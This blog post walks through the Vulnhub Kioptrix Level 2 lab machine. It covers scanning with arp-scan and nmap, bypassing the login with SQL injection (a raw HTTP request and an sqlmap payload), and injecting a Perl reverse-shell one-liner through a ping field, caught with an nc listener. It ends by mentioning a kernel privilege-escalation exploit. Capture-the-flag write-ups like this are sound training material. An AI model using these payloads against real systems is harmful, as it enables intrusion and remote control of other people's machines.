Vulnhub – Kioptrix Level 1.1 (#2) Walkthrough

So, I’m here with my second write-up for Vulnhub – Kioptrix Level 2 challenge. So, we usually start by doing some enumeration on services. but before that we have to find out the IP Address of our machine.

Information Gathering

netdiscover will scan for all devices connected on your network or you can use arp-scan your choice.


arp-scan --interface=eth0 --localnet

Now we have our target IP Address let’s take a look which services are running on that server.


nmap -oA nmap -sC -sV

These are the services running on targeted machine.

PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 443/tcp open https 631/tcp open ipp 3306/tcp open mysql

Port 80 is Running Apache httpd 2.0.52 (CentOS)

Let’s take a look,

Remote System Administration Login, Username and Password field let’s take a look at page source might we find something interesting.

Remote System Administration Login

Nothing special but since we do not have any security checks on username and password field we can try SQLi.


Below is the request which we’re sending and check the response we got.


POST /index.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 55 uname=1’ or ‘1’ = ‘11&psw=1’ or ‘1’ = '1&btnLogin=Login


Welcome to the Basic Administrative Web Console
Ping a Machine on the Network:

So, it was simply SQL Injection (1′ or ‘1’ = ‘1).

We have tested manual SQL Injection. Let’s test SQLmap now.


It generated the payload for us!

Payload: uname=-2356’ OR 1260=1260-- DpYb&psw=admin&btnLogin=Login

Reverse Shell

There’s an another field to run a ping command and tested SQL Injection vulnerabilities again and found a simple ‘;‘ semicolon can be used to bypass this.

So this is what i did.; perl -e ‘use Socket;$i=“”;$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

And i ran “nc -lvp 1337″ on my machine to get reverse shell.

Now we’re going after root access.


By running script we couldn’t find anything interesting but you take a look at kernel version we have some exploits available for that kernel version.

[-] Kernel information (continued): Linux version 2.6.9-55.EL ( (gcc version 3.4.6 20060404 (Red Hat 3.4.6 -8))

After doing Google searches found that this exploit might work so i gave it a try and it actually worked.